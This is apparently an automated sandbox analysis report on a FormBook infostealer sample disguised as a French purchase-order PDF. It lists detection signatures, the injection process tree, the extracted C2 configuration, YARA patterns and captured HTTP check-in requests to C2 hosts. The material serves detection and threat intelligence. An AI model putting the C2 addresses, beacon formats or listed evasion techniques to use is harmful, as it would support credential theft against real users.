Play interactive tour

Edit tour

Windows Analysis Report Nouveau bon de commande. 3007021_pdf.exe

Overview

General Information

Sample Name:	Nouveau bon de commande. 3007021_pdf.exe
Analysis ID:	458861
MD5:	e1d1316d5bc047ec817b950286734ed0
SHA1:	ae3cb4a0103f8daa9ec8f6dc00b6bfeb3f1c52ca
SHA256:	6fd8c63bf53f7364e54505eb98e1b6fc005fbb691a65680e400e7b9104ad1795
Tags:	exeFormbook
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Nouveau bon de commande. 3007021_pdf.exe (PID: 3704 cmdline: 'C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe' MD5: E1D1316D5BC047EC817B950286734ED0)

Nouveau bon de commande. 3007021_pdf.exe (PID: 5028 cmdline: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe MD5: E1D1316D5BC047EC817B950286734ED0)

explorer.exe (PID: 3388 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

WWAHost.exe (PID: 1380 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)

cmd.exe (PID: 4120 cmdline: /c del 'C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 3468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.trucktodock.com/ajs8/"], "decoy": ["lotfysupport.net", "tradingsentral.com", "mobiles240.com", "redecompre.com", "mulliganjames.com", "excursionlanzarote.com", "n1getaccess.com", "wirelessconsole.com", "thevez.net", "joygshpng.com", "arandawines.com", "eliassantis.net", "racevc.com", "mybluemonitor.com", "jual-penggugurkandungan.com", "connectgf.com", "nmpsolutions.com", "anipawesome.com", "vissito.com", "terracottagkp.com", "oemintra.com", "greensecuredeeparchive.com", "zhaoba17.com", "indiadesignstory.com", "handybusy.com", "fkldklfdklfddef.com", "winnadvisorsolutions.com", "signin-solution.com", "comericac.com", "tugqzcc.icu", "discountpty.com", "dhclanrs.com", "tetasdeoro.com", "qroyalrealestate.com", "beweirdbrand.com", "veganonthegreens.info", "paulsplumbingllc.com", "ontimedigitalagency.com", "meohaysucsong.club", "commandherofyou.com", "travelawardsguide.com", "shopvybz.com", "healthylivingawaits.com", "theassistedadrscheme.com", "iphonescreenprotect.com", "zhuqiuhui.space", "514rosemont.com", "labour-exchange.com", "sarahhubrealestate.com", "kcleases.com", "kupitoptom.com", "drayasvista.com", "esmo-2017.com", "jubmoprivacy.com", "heymayafilms.com", "beregnung-mv.com", "relishliferesearchcenter.com", "cchidwick.xyz", "thederbyshiresoapcompany.com", "poconohomeinspectors.com", "gregorymazzalaw.com", "ofaplatinumbonus.com", "laurenbarclay.com", "sickandwireless.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.293883850.0000000001DF0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.293883850.0000000001DF0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.293883850.0000000001DF0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.472762051.0000000002A90000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.472762051.0000000002A90000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.472762051.0000000002A90000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.472841788.0000000002AC0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.472841788.0000000002AC0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.472841788.0000000002AC0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.292188314.0000000001660000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.292188314.0000000001660000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.292188314.0000000001660000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158b9:$sqlite3step: 68 34 1C 7B E1 0x159cc:$sqlite3step: 68 34 1C 7B E1 0x158e8:$sqlite3text: 68 38 2A 90 C5 0x15a0d:$sqlite3text: 68 38 2A 90 C5 0x158fb:$sqlite3blob: 68 53 D8 7F 8C 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000002.00000002.293883850.0000000001DF0000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.trucktodock.com/ajs8/"], "decoy": ["lotfysupport.net", "tradingsentral.com", "mobiles240.com", "redecompre.com", "mulliganjames.com", "excursionlanzarote.com", "n1getaccess.com", "wirelessconsole.com", "thevez.net", "joygshpng.com", "arandawines.com", "eliassantis.net", "racevc.com", "mybluemonitor.com", "jual-penggugurkandungan.com", "connectgf.com", "nmpsolutions.com", "anipawesome.com", "vissito.com", "terracottagkp.com", "oemintra.com", "greensecuredeeparchive.com", "zhaoba17.com", "indiadesignstory.com", "handybusy.com", "fkldklfdklfddef.com", "winnadvisorsolutions.com", "signin-solution.com", "comericac.com", "tugqzcc.icu", "discountpty.com", "dhclanrs.com", "tetasdeoro.com", "qroyalrealestate.com", "beweirdbrand.com", "veganonthegreens.info", "paulsplumbingllc.com", "ontimedigitalagency.com", "meohaysucsong.club", "commandherofyou.com", "travelawardsguide.com", "shopvybz.com", "healthylivingawaits.com", "theassistedadrscheme.com", "iphonescreenprotect.com", "zhuqiuhui.space", "514rosemont.com", "labour-exchange.com", "sarahhubrealestate.com", "kcleases.com", "kupitoptom.com", "drayasvista.com", "esmo-2017.com", "jubmoprivacy.com", "heymayafilms.com", "beregnung-mv.com", "relishliferesearchcenter.com", "cchidwick.xyz", "thederbyshiresoapcompany.com", "poconohomeinspectors.com", "gregorymazzalaw.com", "ofaplatinumbonus.com", "laurenbarclay.com", "sickandwireless.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: Nouveau bon de commande. 3007021_pdf.exe	Virustotal: Detection: 60%	Perma Link
Source: Nouveau bon de commande. 3007021_pdf.exe	Metadefender: Detection: 34%	Perma Link
Source: Nouveau bon de commande. 3007021_pdf.exe	ReversingLabs: Detection: 82%

Yara detected FormBook

Show sources

Source: Yara match	File source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.293883850.0000000001DF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.472762051.0000000002A90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.472841788.0000000002AC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.292188314.0000000001660000.00000040.00000001.sdmp, type: MEMORY

Machine Learning detection for sample

Show sources

Source: Nouveau bon de commande. 3007021_pdf.exe

Joe Sandbox ML: detected

Source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: Nouveau bon de commande. 3007021_pdf.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: Nouveau bon de commande. 3007021_pdf.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: WWAHost.pdb source: Nouveau bon de commande. 3007021_pdf.exe, 00000002.00000002.293934813.0000000001E20000.00000040.00000001.sdmp
Source:	Binary string: WWAHost.pdbUGP source: Nouveau bon de commande. 3007021_pdf.exe, 00000002.00000002.293934813.0000000001E20000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: Nouveau bon de commande. 3007021_pdf.exe, 00000002.00000002.292665175.0000000001AC0000.00000040.00000001.sdmp, WWAHost.exe, 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Nouveau bon de commande. 3007021_pdf.exe, 00000002.00000002.292665175.0000000001AC0000.00000040.00000001.sdmp, WWAHost.exe

Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exe	Code function: 4x nop then pop edi		2_2_004162C4
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 4x nop then pop edi		10_2_028962C4

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 23.227.38.74:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 23.227.38.74:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 23.227.38.74:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.trucktodock.com/ajs8/

Source: global traffic	HTTP traffic detected: GET /ajs8/?q48d=HFQLptYpKX&3fBlVXm=xNYePOcIRg8tONHl062QEzR3pjdpSOb6qFMYs+u8dcNvqsBFMqM/aahx6CIdT83MIu1q HTTP/1.1Host: www.discountpty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ajs8/?3fBlVXm=hqPLwoezIU4RJkzOayN9OUqrFULw7U9SfOZePsq8F9HyGJJZCf9ZB5ZbUnjAkpqHeNor&q48d=HFQLptYpKX HTTP/1.1Host: www.shopvybz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ajs8/?q48d=HFQLptYpKX&3fBlVXm=2BRIB0J+IU74eT9QrM34IgOLc6rvRxRggRQ5Dm44nGBTXrZyhrhiT7zmyDkAgt3Lv1f/ HTTP/1.1Host: www.handybusy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ajs8/?3fBlVXm=PXCQsRsj6f+UKLkz5iYmBV65DPKHBBScBAKRyWuZQRoQL6ffVXDgpay6Ct5U2sE+s5q9&q48d=HFQLptYpKX HTTP/1.1Host: www.theassistedadrscheme.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ajs8/?q48d=HFQLptYpKX&3fBlVXm=LEjUMU+rw+m1MGLci6xLa4kNPPdUPj6aoKRsjeM/sCEy0PaNWwzv7jP2E4a8Zzb0ARTh HTTP/1.1Host: www.indiadesignstory.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ajs8/?q48d=HFQLptYpKX&3fBlVXm=3clrjbd8Uk1yhLkd6I01KEeFnSa+FczhmxXwmvBnovucnEmM2e32CtS7ZjKvb0koSvtC HTTP/1.1Host: www.trucktodock.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 23.227.38.74 23.227.38.74

Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: GET /ajs8/?q48d=HFQLptYpKX&3fBlVXm=xNYePOcIRg8tONHl062QEzR3pjdpSOb6qFMYs+u8dcNvqsBFMqM/aahx6CIdT83MIu1q HTTP/1.1Host: www.discountpty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ajs8/?3fBlVXm=hqPLwoezIU4RJkzOayN9OUqrFULw7U9SfOZePsq8F9HyGJJZCf9ZB5ZbUnjAkpqHeNor&q48d=HFQLptYpKX HTTP/1.1Host: www.shopvybz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ajs8/?q48d=HFQLptYpKX&3fBlVXm=2BRIB0J+IU74eT9QrM34IgOLc6rvRxRggRQ5Dm44nGBTXrZyhrhiT7zmyDkAgt3Lv1f/ HTTP/1.1Host: www.handybusy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ajs8/?3fBlVXm=PXCQsRsj6f+UKLkz5iYmBV65DPKHBBScBAKRyWuZQRoQL6ffVXDgpay6Ct5U2sE+s5q9&q48d=HFQLptYpKX HTTP/1.1Host: www.theassistedadrscheme.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ajs8/?q48d=HFQLptYpKX&3fBlVXm=LEjUMU+rw+m1MGLci6xLa4kNPPdUPj6aoKRsjeM/sCEy0PaNWwzv7jP2E4a8Zzb0ARTh HTTP/1.1Host: www.indiadesignstory.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ajs8/?q48d=HFQLptYpKX&3fBlVXm=3clrjbd8Uk1yhLkd6I01KEeFnSa+FczhmxXwmvBnovucnEmM2e32CtS7ZjKvb0koSvtC HTTP/1.1Host: www.trucktodock.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.jual-penggugurkandungan.com

Source: explorer.exe, 00000003.00000000.263962235.000000000F6C4000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: WWAHost.exe, 0000000A.00000002.477885883.0000000003D32000.00000004.00000001.sdmp	String found in binary or memory: http://travelawardsguide.com/ajs8/?3fBlVXm=SVfnn/RS59BZjQOJq1nGaV1j1LxsdmH7K5f9UuJUxaq5YOiipJWffLZbL
Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Nouveau bon de commande. 3007021_pdf.exe, 00000000.00000003.206509028.0000000000FAD000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnN
Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.261347674.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
